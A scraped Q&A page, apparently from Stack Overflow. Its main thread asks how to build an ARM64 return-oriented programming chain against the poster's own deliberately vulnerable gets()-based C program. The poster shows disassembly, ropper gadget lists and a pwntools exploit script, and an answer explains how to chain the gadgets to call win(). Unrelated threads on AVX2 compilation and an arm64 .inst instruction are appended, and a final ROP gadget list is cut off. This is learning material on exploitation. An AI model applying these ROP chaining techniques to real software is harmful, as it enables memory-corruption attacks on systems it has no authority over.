Return Oriented Programming on ARM (64-bit) - security

I am studying Rop on ARM (64 bit). So i am testing Rop vulnerability on my ARMv8 Cortex A-72 in order to understand how it works on Arm64.
I wrote a very simple c vulnerable code:
#include <stdio.h>
#include <string.h>
void win(unsigned magic){
if(magic == 0xdeadbeef)
printf("I Should Never be Called!\n");
}
void vuln(){
char buffer[80];
printf("Buffer at:%p\n",buffer);
gets(buffer);
}
int main(int argc, char **argv){
vuln();
}
In order to call the win function i think the correct rop chain is:
offset + pop {x0,pc} + correct_argument + win_address
This is the assembly code:
Dump of assembler code for function main:
0x00000055555557f8 <+0>: stp x29, x30, [sp, #-32]!
0x00000055555557fc <+4>: mov x29, sp
0x0000005555555800 <+8>: str w0, [sp, #28]
0x0000005555555804 <+12>: str x1, [sp, #16]
0x0000005555555808 <+16>: bl 0x55555557c8 <vuln>
0x000000555555580c <+20>: mov w0, #0x0 // #0
0x0000005555555810 <+24>: ldp x29, x30, [sp], #32
0x0000005555555814 <+28>: ret
Dump of assembler code for function vuln:
0x00000055555557c8 <+0>: stp x29, x30, [sp, #-96]!
0x00000055555557cc <+4>: mov x29, sp
0x00000055555557d0 <+8>: add x0, sp, #0x10
0x00000055555557d4 <+12>: mov x1, x0
0x00000055555557d8 <+16>: adrp x0, 0x5555555000
0x00000055555557dc <+20>: add x0, x0, #0x8c0
0x00000055555557e0 <+24>: bl 0x5555555680 <printf#plt>
0x00000055555557e4 <+28>: add x0, sp, #0x10
0x00000055555557e8 <+32>: bl 0x5555555690 <gets#plt>
0x00000055555557ec <+36>: nop
0x00000055555557f0 <+40>: ldp x29, x30, [sp], #96
0x00000055555557f4 <+44>: ret
Dump of assembler code for function win:
0x00000055555557b4 <+0>: sub sp, sp, #0x10
0x00000055555557b8 <+4>: str w0, [sp, #12]
0x00000055555557bc <+8>: nop
0x00000055555557c0 <+12>: add sp, sp, #0x10
0x00000055555557c4 <+16>: ret
I disabled the ASLR first. Then using gdb i identified the offset at which the pc gets overwritten. The offset is 96 bytes. The last 8 bytes of the offset overflow the link register therefore the pc will point to that. So the next step is to search the right gadget. Since i am working on ARMv8 and the function win() takes one argument i am looking for a pop {x0, pc} gadget to mount my rop chain. I used ropper to search for gadgets to build the rop chain. Following the output of ropper command:
0x00000000000007c0: add sp, sp, #0x10; ret;
0x00000000000007e4: add x0, sp, #0x10; bl #0x690; nop; ldp x29, x30, [sp], #0x60; ret;
0x0000000000000648: add x16, x16, #0; br x17;
0x0000000000000668: add x16, x16, #0x10; br x17;
0x0000000000000678: add x16, x16, #0x18; br x17;
0x0000000000000688: add x16, x16, #0x20; br x17;
0x0000000000000698: add x16, x16, #0x28; br x17;
0x000000000000062c: add x16, x16, #0xff8; br x17;
0x0000000000000658: add x16, x16, #8; br x17;
0x0000000000000870: add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
0x00000000000006d8: adrp x0, #0x10000; ldr x0, [x0, #0xfc8]; cbz x0, #0x6e8; b #0x660; ret;
0x0000000000000708: adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x71c; mov x16, x1; br x16;
0x0000000000000708: adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x71c; mov x16, x1; br x16; ret;
0x0000000000000624: adrp x16, #0x10000; ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17;
0x0000000000000660: adrp x16, #0x11000; ldr x17, [x16, #0x10]; add x16, x16, #0x10; br x17;
0x0000000000000670: adrp x16, #0x11000; ldr x17, [x16, #0x18]; add x16, x16, #0x18; br x17;
0x0000000000000680: adrp x16, #0x11000; ldr x17, [x16, #0x20]; add x16, x16, #0x20; br x17;
0x0000000000000690: adrp x16, #0x11000; ldr x17, [x16, #0x28]; add x16, x16, #0x28; br x17;
0x0000000000000650: adrp x16, #0x11000; ldr x17, [x16, #8]; add x16, x16, #8; br x17;
0x0000000000000640: adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17;
0x0000000000000744: adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x758; mov x16, x2; br x16;
0x0000000000000744: adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x758; mov x16, x2; br x16; ret;
0x00000000000006e4: b #0x660; ret;
0x00000000000007b0: b #0x720; sub sp, sp, #0x10; str w0, [sp, #0xc]; nop; add sp, sp, #0x10; ret;
0x0000000000000704: b.eq #0x71c; adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x71c; mov x16, x1; br x16;
0x0000000000000884: b.ne #0x868; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x00000000000006d4: bl #0x670; adrp x0, #0x10000; ldr x0, [x0, #0xfc8]; cbz x0, #0x6e8; b #0x660; ret;
0x00000000000007e0: bl #0x680; add x0, sp, #0x10; bl #0x690; nop; ldp x29, x30, [sp], #0x60; ret;
0x00000000000007e8: bl #0x690; nop; ldp x29, x30, [sp], #0x60; ret;
0x0000000000000610: bl #0x6d8; ldp x29, x30, [sp], #0x10; ret;
0x0000000000000790: bl #0x6f0; movz w0, #0x1; strb w0, [x19, #0x40]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000808: bl #0x7c8; movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x000000000000087c: blr x3;
0x0000000000000718: br x16;
0x0000000000000718: br x16; ret;
0x0000000000000630: br x17;
0x00000000000006e0: cbz x0, #0x6e8; b #0x660; ret;
0x0000000000000710: cbz x1, #0x71c; mov x16, x1; br x16;
0x0000000000000710: cbz x1, #0x71c; mov x16, x1; br x16; ret;
0x0000000000000740: cbz x1, #0x758; adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x758; mov x16, x2; br x16;
0x000000000000074c: cbz x2, #0x758; mov x16, x2; br x16;
0x000000000000074c: cbz x2, #0x758; mov x16, x2; br x16; ret;
0x0000000000000888: ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x000000000000088c: ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x0000000000000890: ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x0000000000000614: ldp x29, x30, [sp], #0x10; ret;
0x00000000000007a0: ldp x29, x30, [sp], #0x20; ret;
0x0000000000000894: ldp x29, x30, [sp], #0x40; ret;
0x00000000000007f0: ldp x29, x30, [sp], #0x60; ret;
0x00000000000006dc: ldr x0, [x0, #0xfc8]; cbz x0, #0x6e8; b #0x660; ret;
0x000000000000070c: ldr x1, [x1, #0xfb8]; cbz x1, #0x71c; mov x16, x1; br x16;
0x000000000000070c: ldr x1, [x1, #0xfb8]; cbz x1, #0x71c; mov x16, x1; br x16; ret;
0x0000000000000664: ldr x17, [x16, #0x10]; add x16, x16, #0x10; br x17;
0x0000000000000674: ldr x17, [x16, #0x18]; add x16, x16, #0x18; br x17;
0x0000000000000684: ldr x17, [x16, #0x20]; add x16, x16, #0x20; br x17;
0x0000000000000694: ldr x17, [x16, #0x28]; add x16, x16, #0x28; br x17;
0x0000000000000628: ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17;
0x0000000000000654: ldr x17, [x16, #8]; add x16, x16, #8; br x17;
0x0000000000000644: ldr x17, [x16]; add x16, x16, #0; br x17;
0x000000000000079c: ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000748: ldr x2, [x2, #0xfe0]; cbz x2, #0x758; mov x16, x2; br x16;
0x0000000000000748: ldr x2, [x2, #0xfe0]; cbz x2, #0x758; mov x16, x2; br x16; ret;
0x0000000000000868: ldr x3, [x21, x19, lsl #3]; mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
0x0000000000000878: mov w0, w22; blr x3;
0x0000000000000874: mov x1, x23; mov w0, w22; blr x3;
0x0000000000000714: mov x16, x1; br x16;
0x0000000000000714: mov x16, x1; br x16; ret;
0x0000000000000750: mov x16, x2; br x16;
0x0000000000000750: mov x16, x2; br x16; ret;
0x000000000000086c: mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
0x000000000000060c: mov x29, sp; bl #0x6d8; ldp x29, x30, [sp], #0x10; ret;
0x00000000000008a8: mov x29, sp; ldp x29, x30, [sp], #0x10; ret;
0x000000000000080c: movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000794: movz w0, #0x1; strb w0, [x19, #0x40]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000620: stp x16, x30, [sp, #-0x10]!; adrp x16, #0x10000; ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17;
0x0000000000000608: stp x29, x30, [sp, #-0x10]!; mov x29, sp; bl #0x6d8; ldp x29, x30, [sp], #0x10; ret;
0x00000000000008a4: stp x29, x30, [sp, #-0x10]!; mov x29, sp; ldp x29, x30, [sp], #0x10; ret;
0x0000000000000800: str w0, [sp, #0x1c]; str x1, [sp, #0x10]; bl #0x7c8; movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x00000000000007b8: str w0, [sp, #0xc]; nop; add sp, sp, #0x10; ret;
0x0000000000000804: str x1, [sp, #0x10]; bl #0x7c8; movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000798: strb w0, [x19, #0x40]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x00000000000007b4: sub sp, sp, #0x10; str w0, [sp, #0xc]; nop; add sp, sp, #0x10; ret;
0x00000000000007bc: nop; add sp, sp, #0x10; ret;
0x000000000000063c: nop; adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17;
0x00000000000007ec: nop; ldp x29, x30, [sp], #0x60; ret;
0x0000000000000638: nop; nop; adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17;
0x000000000000089c: nop; ret;
0x0000000000000618: ret;
How you can see there is no gadgets like pop {x0,pc} however reading the armv8 cheat sheet the ldp x29, x30, [sp], #0x60 pop x29 and x30 from the stack so basically we can consider ldp as a pop instruction. But again there is no gadget which pop the x0 register from stack.
So my question is: How can i mount the rop chain having that gadgets from roppper ?
Please help me to understand it. Thank you.
My exploit:
from pwn import *
#gadget
win = p64(0x000000555555580c)
gadget_ldp = p64(0x00000000000008f8) #ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
gadget_ldr = p64(0x00000000000008d8) # ldr x3, [x21, x19, lsl #3]; mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
magic = p64(0xdeadbeef)
buf = p64(0x7ffffff000)
#payload
payload = b'\x90'*56;
payload += win;
payload += b'\x90'*24; #offset
payload += gadget_ldp;
payload += b'\x00'*8; #in x19 must be zero
payload += b'\x90'*8; # ldp register x20
payload += buf; #ldp register x21
payload += magic; #ldp register x22
payload += b'\x90'*8; #ldp register x23
payload += b'\x90'*8; #ldp register x24
payload += gadget_ldr;
#make connection to the binary and send payload
conn = process('./badcode')
conn.sendline(payload)
print(conn.recvline())
conn.interactive()

With the gadget at 0x0888 we can load all of x19-x24 from the stack and return, so we can set all their values arbitrarily and go on.
0x0878 has mov w0, w22, which is nice, but then the branch is to x3 which we don't yet control.
But back up a few instructions and look at the 0x0868 gadget. Notable for us is:
ldr x3, [x21, x19, lsl #3]
//...
mov w0, w22
blr x3
So if in our previous step, we loaded x21 with some address where a pointer to win can be found (maybe a place on the stack that we've set), and set x19 to zero, then we get win in x3. And likewise if in our previous step we loaded x22 with 0xdeadbeef, then we get it in w0 here. So we should be able to branch to win with w0 set as desired.

Related

Can't get vectorclass library to compile to AVX2 instructions in MSVC2019

I have tried my best to get the vectorclass library to generate AVX2 instructions, but can't get it to.
I'm using MSVC2019. Here are the compile options:
/permissive- /ifcOutput "x64\Release" /GS /Qpar /GL /W3 /Gy /Zc:wchar_t /I"D:\Tools\vectorclass" /I"D:\Tools\libzmq/include" /I"D:\Tools\boost\boost_1_79_0" /Zi /Gm- /O2 /Ob2 /sdl /Fd"x64\Release\vc142.pdb" /Zc:inline /D "__AVX2__" /D "ZMQ_STATIC" /D "FILE_INPUT" /D "NDEBUG" /D "WIN32" /D "_CRT_SECURE_NO_WARNINGS" /D "_CONSOLE" /D "_UNICODE" /D "UNICODE" /errorReport:prompt /WX- /Zc:forScope /std:c17 /arch:AVX2 /Gd /Oi /MT /std:c++17 /FC /Fa"x64\Release" /EHsc /nologo /Fo"x64\Release" /Ot /Fp"x64\Release\RtnLink_MSVC.pch" /diagnostics:column
In addition I've tried to force it with macro definitions AVX2 and INSTRSET but no luck.
#define INSTRSET (8)
#define __AVX2__
#pragma warning(disable : 4984) //warning C4984: 'if constexpr' is a C++17 language extension
#include "vectorclass.h"
size_t test(size_t size) {
Vec8ui incr(8);
Vec8ui accum(0, 1, 2, 3, 4, 5, 6, 7);
for (size_t i = 8; i < size; i += 8) {
accum = accum + accum;
}
size_t result = horizontal_max(accum);
const __m256i incr2 = _mm256_set1_epi32(8);
__m256i accum2 = _mm256_setr_epi32(0, 1, 2, 3, 4, 5, 6, 7);
for (size_t i = 8; i < size; i += 8) {
accum2 = _mm256_add_epi32(accum2, incr2);
}
__declspec(align(32)) int32_t values_array[8];
_mm256_store_si256((__m256i*)values_array, accum2);
size_t result2 = values_array[0];
for (int i = 1; i < 8; i++) {
if (values_array[i] > result2) {
result2 = values_array[i];
}
}
return result;
}
This compiles to the following 2 loops:
Using vectorclass (no AVX2 instructions):
Vec8ui incr(8);
00007FF7A9BC2E5A mov edx,8
00007FF7A9BC2E5F lea rcx,[incr]
00007FF7A9BC2E63 call Vec8ui::Vec8ui (07FF7A9B58BFEh)
Vec8ui accum(0, 1, 2, 3, 4, 5, 6, 7);
00007FF7A9BC2E68 mov dword ptr [rsp+40h],7
00007FF7A9BC2E70 mov dword ptr [rsp+38h],6
00007FF7A9BC2E78 mov dword ptr [rsp+30h],5
00007FF7A9BC2E80 mov dword ptr [rsp+28h],4
00007FF7A9BC2E88 mov dword ptr [rsp+20h],3
00007FF7A9BC2E90 mov r9d,2
00007FF7A9BC2E96 mov r8d,1
00007FF7A9BC2E9C xor edx,edx
00007FF7A9BC2E9E lea rcx,[accum]
00007FF7A9BC2EA2 call Vec8ui::Vec8ui (07FF7A9B54B99h)
for (size_t i = 8; i < size; i += 8) {
00007FF7A9BC2EA7 mov qword ptr [rbp+98h],8
00007FF7A9BC2EB2 jmp __$EncStackInitStart+0A2h (07FF7A9BC2EC6h)
00007FF7A9BC2EB4 mov rax,qword ptr [rbp+98h]
00007FF7A9BC2EBB add rax,8
00007FF7A9BC2EBF mov qword ptr [rbp+98h],rax
00007FF7A9BC2EC6 mov rax,qword ptr [size]
00007FF7A9BC2ECD cmp qword ptr [rbp+98h],rax
00007FF7A9BC2ED4 jae __$EncStackInitStart+10Fh (07FF7A9BC2F33h)
accum = accum + accum;
00007FF7A9BC2ED6 lea rax,[rbp+4C0h]
00007FF7A9BC2EDD lea rcx,[accum]
00007FF7A9BC2EE1 mov rdi,rax
00007FF7A9BC2EE4 mov rsi,rcx
00007FF7A9BC2EE7 mov ecx,20h
00007FF7A9BC2EEC rep movs byte ptr [rdi],byte ptr [rsi]
00007FF7A9BC2EEE lea rax,[rbp+480h]
00007FF7A9BC2EF5 lea rcx,[accum]
00007FF7A9BC2EF9 mov rdi,rax
00007FF7A9BC2EFC mov rsi,rcx
00007FF7A9BC2EFF mov ecx,20h
00007FF7A9BC2F04 rep movs byte ptr [rdi],byte ptr [rsi]
00007FF7A9BC2F06 lea r8,[rbp+4C0h]
00007FF7A9BC2F0D lea rdx,[rbp+480h]
00007FF7A9BC2F14 lea rcx,[rbp+380h]
00007FF7A9BC2F1B call operator+ (07FF7A9BC29C0h)
00007FF7A9BC2F20 lea rcx,[accum]
00007FF7A9BC2F24 mov rdi,rcx
00007FF7A9BC2F27 mov rsi,rax
00007FF7A9BC2F2A mov ecx,20h
00007FF7A9BC2F2F rep movs byte ptr [rdi],byte ptr [rsi]
}
00007FF7A9BC2F31 jmp __$EncStackInitStart+90h (07FF7A9BC2EB4h)
size_t result = horizontal_max(accum);
00007FF7A9BC2F33 lea rax,[rbp+500h]
00007FF7A9BC2F3A lea rcx,[accum]
00007FF7A9BC2F3E mov rdi,rax
00007FF7A9BC2F41 mov rsi,rcx
00007FF7A9BC2F44 mov ecx,20h
00007FF7A9BC2F49 rep movs byte ptr [rdi],byte ptr [rsi]
00007FF7A9BC2F4B lea rcx,[rbp+500h]
00007FF7A9BC2F52 call horizontal_max<Vec8ui> (07FF7A9B54FB3h)
00007FF7A9BC2F57 mov eax,eax
00007FF7A9BC2F59 mov qword ptr [result],rax
Using intrinsics (we get AVX2 instructions):
const __m256i incr2 = _mm256_set1_epi32(8);
00007FF7A9BC2F60 vmovdqu ymm0,ymmword ptr [__ymm#0000000800000008000000080000000800000008000000080000000800000008 (07FF7A9E87940h)]
00007FF7A9BC2F68 vmovdqu ymmword ptr [rbp+3C0h],ymm0
00007FF7A9BC2F70 vmovdqu ymm0,ymmword ptr [rbp+3C0h]
00007FF7A9BC2F78 vmovdqu ymmword ptr [incr2],ymm0
__m256i accum2 = _mm256_setr_epi32(0, 1, 2, 3, 4, 5, 6, 7);
00007FF7A9BC2F80 vmovdqu ymm0,ymmword ptr [__ymm#0000000700000006000000050000000400000003000000020000000100000000 (07FF7A9E87900h)]
00007FF7A9BC2F88 vmovdqu ymmword ptr [rbp+400h],ymm0
00007FF7A9BC2F90 vmovdqu ymm0,ymmword ptr [rbp+400h]
00007FF7A9BC2F98 vmovdqu ymmword ptr [accum2],ymm0
for (size_t i = 8; i < size; i += 8) {
00007FF7A9BC2FA0 mov qword ptr [rbp+158h],8
00007FF7A9BC2FAB jmp __$EncStackInitStart+19Bh (07FF7A9BC2FBFh)
00007FF7A9BC2FAD mov rax,qword ptr [rbp+158h]
00007FF7A9BC2FB4 add rax,8
00007FF7A9BC2FB8 mov qword ptr [rbp+158h],rax
00007FF7A9BC2FBF mov rax,qword ptr [size]
00007FF7A9BC2FC6 cmp qword ptr [rbp+158h],rax
00007FF7A9BC2FCD jae __$EncStackInitStart+1D5h (07FF7A9BC2FF9h)
accum2 = _mm256_add_epi32(accum2, incr2);
00007FF7A9BC2FCF vmovdqu ymm0,ymmword ptr [accum2]
00007FF7A9BC2FD7 vpaddd ymm0,ymm0,ymmword ptr [incr2]
00007FF7A9BC2FDF vmovdqu ymmword ptr [rbp+440h],ymm0
00007FF7A9BC2FE7 vmovdqu ymm0,ymmword ptr [rbp+440h]
00007FF7A9BC2FEF vmovdqu ymmword ptr [accum2],ymm0
}
00007FF7A9BC2FF7 jmp __$EncStackInitStart+189h (07FF7A9BC2FADh)
__declspec(align(32)) int32_t values_array[8];
_mm256_store_si256((__m256i*)values_array, accum2);
00007FF7A9BC2FF9 vmovdqu ymm0,ymmword ptr [accum2]
00007FF7A9BC3001 vmovdqa ymmword ptr [values_array],ymm0
size_t result2 = values_array[0];
00007FF7A9BC3009 mov eax,4
00007FF7A9BC300E imul rax,rax,0
00007FF7A9BC3012 movsxd rax,dword ptr values_array[rax]
00007FF7A9BC301A mov qword ptr [result2],rax
for (int i = 1; i < 8; i++) {
00007FF7A9BC3021 mov dword ptr [rbp+1D4h],1
00007FF7A9BC302B jmp __$EncStackInitStart+217h (07FF7A9BC303Bh)
00007FF7A9BC302D mov eax,dword ptr [rbp+1D4h]
00007FF7A9BC3033 inc eax
00007FF7A9BC3035 mov dword ptr [rbp+1D4h],eax
00007FF7A9BC303B cmp dword ptr [rbp+1D4h],8
00007FF7A9BC3042 jge __$EncStackInitStart+250h (07FF7A9BC3074h)
if (values_array[i] > result2) {
00007FF7A9BC3044 movsxd rax,dword ptr [rbp+1D4h]
00007FF7A9BC304B movsxd rax,dword ptr values_array[rax*4]
00007FF7A9BC3053 cmp rax,qword ptr [result2]
00007FF7A9BC305A jbe __$EncStackInitStart+24Eh (07FF7A9BC3072h)
result2 = values_array[i];
00007FF7A9BC305C movsxd rax,dword ptr [rbp+1D4h]
00007FF7A9BC3063 movsxd rax,dword ptr values_array[rax*4]
00007FF7A9BC306B mov qword ptr [result2],rax

What's meaning of ".inst" in arm assembly instruction

Kernel version : 4.14.199
The spin_lock assembly instructions in crash is
crash_arm64> dis _raw_spin_lock -x
0xffffff8008c41e90 <_raw_spin_lock>: stp x29, x30, [sp,#-32]!
0xffffff8008c41e94 <_raw_spin_lock+0x4>: str x19, [sp,#16]
0xffffff8008c41e98 <_raw_spin_lock+0x8>: mov x29, sp
0xffffff8008c41e9c <_raw_spin_lock+0xc>: mov x19, x0
0xffffff8008c41ea0 <_raw_spin_lock+0x10>: nop
0xffffff8008c41ea4 <_raw_spin_lock+0x14>: mov w0, #0x1 // #1
0xffffff8008c41ea8 <_raw_spin_lock+0x18>: bl 0xffffff80080f399c <preempt_count_add>
0xffffff8008c41eac <_raw_spin_lock+0x1c>: mov w10, #0x10000 // #65536
0xffffff8008c41eb0 <_raw_spin_lock+0x20>: .inst 0xb8aa0268 ; undefined
0xffffff8008c41eb4 <_raw_spin_lock+0x24>: nop
0xffffff8008c41eb8 <_raw_spin_lock+0x28>: nop
0xffffff8008c41ebc <_raw_spin_lock+0x2c>: nop
0xffffff8008c41ec0 <_raw_spin_lock+0x30>: eor w9, w8, w8, ror #16
0xffffff8008c41ec4 <_raw_spin_lock+0x34>: cbz w9, 0xffffff8008c41edc <_raw_spin_lock+0x4c>
0xffffff8008c41ec8 <_raw_spin_lock+0x38>: sevl
0xffffff8008c41ecc <_raw_spin_lock+0x3c>: wfe
0xffffff8008c41ed0 <_raw_spin_lock+0x40>: ldaxrh w10, [x19]
0xffffff8008c41ed4 <_raw_spin_lock+0x44>: eor w9, w10, w8, lsr #16
0xffffff8008c41ed8 <_raw_spin_lock+0x48>: cbnz w9, 0xffffff8008c41ecc <_raw_spin_lock+0x3c>
0xffffff8008c41edc <_raw_spin_lock+0x4c>: ldr x19, [sp,#16]
0xffffff8008c41ee0 <_raw_spin_lock+0x50>: ldp x29, x30, [sp],#32
0xffffff8008c41ee4 <_raw_spin_lock+0x54>: ret
What's the meaning of .inst instructions ?
0xffffff8008c41eb0 <_raw_spin_lock+0x20>: .inst 0xb8aa0268 ; undefined
I found the function definition in arch/arm64/include/asm/spinlock.h.
static inline void arch_spin_lock(arch_spinlock_t *lock)
{
unsigned int tmp;
arch_spinlock_t lockval, newval;
asm volatile(
/* Atomically increment the next ticket. */
ARM64_LSE_ATOMIC_INSN(
/* LL/SC */
" prfm pstl1strm, %3\n"
"1: ldaxr %w0, %3\n"
" add %w1, %w0, %w5\n"
" stxr %w2, %w1, %3\n"
" cbnz %w2, 1b\n",
/* LSE atomics */
" mov %w2, %w5\n"
" ldadda %w2, %w0, %3\n"
__nops(3)
)
/* Did we get the lock? */
" eor %w1, %w0, %w0, ror #16\n"
" cbz %w1, 3f\n"
/*
* No: spin on the owner. Send a local event to avoid missing an
* unlock before the exclusive load.
*/
" sevl\n"
"2: wfe\n"
" ldaxrh %w2, %4\n"
" eor %w1, %w2, %w0, lsr #16\n"
" cbnz %w1, 2b\n"
/* We got the lock. Critical section starts here. */
"3:"
: "=&r" (lockval), "=&r" (newval), "=&r" (tmp), "+Q" (*lock)
: "Q" (lock->owner), "I" (1 << TICKET_SHIFT)
: "memory");
}
In my opinion, the .inst 0xb8aa0268 should correspond to ldadda %w2, %w0, %3\n".
Why the crash displayed is different from the source code ?

Find out where rop gadgets are actually loaded in memory using Ropper

I am studying ROP on Arm64, I posted my thread here Return Oriented Programming on ARM (64-bit)
However a new/separate issue about choosing rop gadgets has arisen which requires the opening of a new thread. So to sum up i am studying ROP vulnerability on ARM 64 bit and i am trying to test it using a very simple c code (attached to the previous thread).
I'am using ropper tool in order to search for gadgets to build my rop chain. But when i overflow the pc with the address of the gadget i got this within gdb:
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x8f8
stopped 0x8f8 in ?? ()
I overflow the pc with 0x00000000000008f8 gadget but it can't be the actual address loaded in memory.
Here the list of rop gadgets that i have got by using ropper:
0x0000000000000858: add x0, sp, #0x10; bl #0x6e0; nop; ldp x29, x30, [sp], #0x60; ret;
0x0000000000000828: add x0, x0, #0x930; bl #0x6c0; nop; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000688: add x16, x16, #0; br x17;
0x00000000000006a8: add x16, x16, #0x10; br x17;
0x00000000000006b8: add x16, x16, #0x18; br x17;
0x00000000000006c8: add x16, x16, #0x20; br x17;
0x00000000000006d8: add x16, x16, #0x28; br x17;
0x00000000000006e8: add x16, x16, #0x30; br x17;
0x000000000000066c: add x16, x16, #0xff8; br x17;
0x0000000000000698: add x16, x16, #8; br x17;
0x00000000000008e0: add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
0x0000000000000824: adrp x0, #0; add x0, x0, #0x930; bl #0x6c0; nop; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000728: adrp x0, #0x10000; ldr x0, [x0, #0xfc8]; cbz x0, #0x738; b #0x6a0; ret;
0x0000000000000758: adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x76c; mov x16, x1; br x16;
0x0000000000000758: adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x76c; mov x16, x1; br x16; ret;
0x0000000000000664: adrp x16, #0x10000; ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17;
0x00000000000006a0: adrp x16, #0x11000; ldr x17, [x16, #0x10]; add x16, x16, #0x10; br x17;
0x00000000000006b0: adrp x16, #0x11000; ldr x17, [x16, #0x18]; add x16, x16, #0x18; br x17;
0x00000000000006c0: adrp x16, #0x11000; ldr x17, [x16, #0x20]; add x16, x16, #0x20; br x17;
0x00000000000006d0: adrp x16, #0x11000; ldr x17, [x16, #0x28]; add x16, x16, #0x28; br x17;
0x00000000000006e0: adrp x16, #0x11000; ldr x17, [x16, #0x30]; add x16, x16, #0x30; br x17;
0x0000000000000690: adrp x16, #0x11000; ldr x17, [x16, #8]; add x16, x16, #8; br x17;
0x0000000000000680: adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17;
0x0000000000000794: adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x7a8; mov x16, x2; br x16;
0x0000000000000794: adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x7a8; mov x16, x2; br x16; ret;
0x0000000000000734: b #0x6a0; ret;
0x0000000000000754: b.eq #0x76c; adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x76c; mov x16, x1; br x16;
0x00000000000008f4: b.ne #0x8d8; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x0000000000000724: bl #0x6b0; adrp x0, #0x10000; ldr x0, [x0, #0xfc8]; cbz x0, #0x738; b #0x6a0; ret;
0x000000000000082c: bl #0x6c0; nop; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000854: bl #0x6d0; add x0, sp, #0x10; bl #0x6e0; nop; ldp x29, x30, [sp], #0x60; ret;
0x000000000000085c: bl #0x6e0; nop; ldp x29, x30, [sp], #0x60; ret;
0x0000000000000648: bl #0x728; ldp x29, x30, [sp], #0x10; ret;
0x00000000000007e0: bl #0x740; movz w0, #0x1; strb w0, [x19, #0x48]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x000000000000087c: bl #0x83c; movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x00000000000008ec: blr x3;
0x0000000000000768: br x16;
0x0000000000000768: br x16; ret;
0x0000000000000670: br x17;
0x0000000000000730: cbz x0, #0x738; b #0x6a0; ret;
0x0000000000000760: cbz x1, #0x76c; mov x16, x1; br x16;
0x0000000000000760: cbz x1, #0x76c; mov x16, x1; br x16; ret;
0x0000000000000790: cbz x1, #0x7a8; adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x7a8; mov x16, x2; br x16;
0x000000000000079c: cbz x2, #0x7a8; mov x16, x2; br x16;
0x000000000000079c: cbz x2, #0x7a8; mov x16, x2; br x16; ret;
0x00000000000008f8: ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x00000000000008fc: ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x0000000000000900: ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x000000000000064c: ldp x29, x30, [sp], #0x10; ret;
0x00000000000007f0: ldp x29, x30, [sp], #0x20; ret;
0x0000000000000904: ldp x29, x30, [sp], #0x40; ret;
0x0000000000000864: ldp x29, x30, [sp], #0x60; ret;
0x000000000000072c: ldr x0, [x0, #0xfc8]; cbz x0, #0x738; b #0x6a0; ret;
0x000000000000075c: ldr x1, [x1, #0xfb8]; cbz x1, #0x76c; mov x16, x1; br x16;
0x000000000000075c: ldr x1, [x1, #0xfb8]; cbz x1, #0x76c; mov x16, x1; br x16; ret;
0x00000000000006a4: ldr x17, [x16, #0x10]; add x16, x16, #0x10; br x17;
0x00000000000006b4: ldr x17, [x16, #0x18]; add x16, x16, #0x18; br x17;
